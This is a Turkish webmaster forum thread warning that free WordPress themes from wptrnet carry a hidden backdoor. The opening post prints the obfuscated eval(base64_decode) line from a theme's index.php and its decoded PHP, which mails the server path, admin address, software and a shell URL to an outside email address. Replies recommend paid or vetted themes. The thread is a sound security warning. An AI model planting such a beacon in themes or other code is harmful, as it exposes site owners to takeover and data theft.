İyinet'e Hoşgeldiniz!

Türkiye'nin En Eski Webmaster Forum'una Hemen Kayıt Olun!

Kayıt Ol!

wptrnet Temalarını Sakın Çekmeyin Siteniz heklenir ! ..

Windowsxp

0
İyinet Üyesi
Reaction score
0
Yeni Yaptıgım Bir Site için Tema araştırıyordum bu detay gözume takıldı .. Klasör içindeki index.php en alt satırında

PHP:
<? eval(base64_decode("JGtpbWU9ImluZGlyZWxpbWhlbWVuQGdtYWlsLmNvbSI7DQokYmFzbGlrPSJXb3JkUHJlc1MgVGVtYSBTdyBBdmNpc2kgVjMuMCI7DQokRUxfTXVIYU1NZUQ9IkRvc3lhIFlvbHUgOiAiLiRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10uInJuIjsNCiRFTF9NdUhhTU1lRC49IlNlcnZlciBBZG1pbiA6ICIuJF9TRVJWRVJbJ1NFUlZFUl9BRE1JTiddLiJybiI7DQokRUxfTXVIYU1NZUQuPSJTZXJ2ZXIgaXNsZXRpbSBzaXN0ZW1pIDogIi4kX1NFUlZFUlsnU0VSVkVSX1NPRlRXQVJFJ10uInJuIjsNCiRFTF9NdUhhTU1lRC49IlNoZWxsIExpbmsgOiBodHRwOi8vIi4kX1NFUlZFUlsnU0VSVkVSX05BTUUnXS4kX1NFUlZFUlsnUEhQX1NFTEYnXS4icm4iOw0KJEVMX011SGFNTWVELj0iQXZsYW5hbiBTaXRlIDogIiAuJF9TRVJWRVJbJ0hUVFBfSE9TVCddLiJybiI7DQptYWlsKCRraW1lLCAkYmFzbGlrLCAkRUxfTXVIYU1NZUQpOw=="));?>

Yazmakta idi merak edip araştırdım bu kodda ne yazıyor diye :) iyi bakın ne yazıyor..

PHP:
z��r�^$kime="[email protected]";
$baslik="WordPresS Tema Sw Avcisi V3.0";
$EL_MuHaMMeD="Dosya Yolu : ".$_SERVER['DOCUMENT_ROOT']."rn";
$EL_MuHaMMeD.="Server Admin : ".$_SERVER['SERVER_ADMIN']."rn";
$EL_MuHaMMeD.="Server isletim sistemi : ".$_SERVER['SERVER_SOFTWARE']."rn";
$EL_MuHaMMeD.="Shell Link : http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."rn";
$EL_MuHaMMeD.="Avlanan Site : " .$_SERVER['HTTP_HOST']."rn";
mail($kime, $baslik, $EL_MuHaMMeD);

Buda yetmezmiş gibi Shell eklemişler scriptlere Siteleri heklemek için .. headers.php içine shell kodlarını eklemişler admin
ve db nizi heklemek adına .. Siz Siz Olun Dikkatli Olun Bunu Açıklayanı pek görmedim Beni Çok heklemişlerdi Sizin Başınıza
gelmesin dileklerimle ..

headers.php kodlarınıda eklemiştim ama konuyu açamadım yazı boyutu acısından izin vermedi ..

Yukardaki yazılanları dikkate alınız arkadaşlar Admin şifrenizi Databasenizi dahil çalabiliyorlar Birde neden hekleniyoruz deriz :) Temalar Sagolsun..

Çektiğim tema adı : wptrnet-simple-organization

kuzgun

İyinet Üyesi
Onaylı Üye
Reaction score
254
base 64 bütün temalarında var ama şu verdiğin diğer kodlar hangi dosyada?

Furkanturan

0
İyinet Üyesi
Reaction score
4
Böle genel dağıtım yapan siteler yerine asıl tema yapan arkadaşların temalarını kullanmanız gayet iyi olur :) @Cem Demir,@Coşkun Deniz gibi gibi kişilerin temaları 1 numaradır mesela ;)

retrospektif

0
İyinet Üyesi
Reaction score
48
Böle genel dağıtım yapan siteler yerine asıl tema yapan arkadaşların temalarını kullanmanız gayet iyi olur :) @Cem Demir,@Coşkun Deniz gibi gibi kişilerin temaları 1 numaradır mesela ;)

+

http://themeforest.net ... vb ... tema satışı yapan, bu hizmeti veren sitelerden paraya kıyıp almak da iyi olacaktır. Güzel şeyler ortaya çıkarmak için bedel ödenmeli diye düşünüyorum. Bu aynı zamanda mevcut piyasayı olumlu yönde etkileyecek ve daha güzel temalar uygun fiyatla vitrinde yerini alacaktır ;)

Nightmare17

0
İyinet Üyesi
Reaction score
5
Ücretli tema kullanmak veya wordpress'in kendi sitesindeki gibi incelenmiş temaların olduğu güvenilir yerlerden kullanmak lazım.

Türkiye’nin ilk webmaster forum sitesi iyinet.com'da forum üyeleri tarafından yapılan tüm paylaşımlardan; Türk Ceza Kanunu’nun 20. Maddesinin, 5651 Sayılı Kanununun 4. maddesinin 2. fıkrasına göre, paylaşım yapan üyeler sorumludur.

Backlink ve Tanıtım Yazısı için iletişime geçmek için Skype Adresimiz: .cid.1580508955483fe5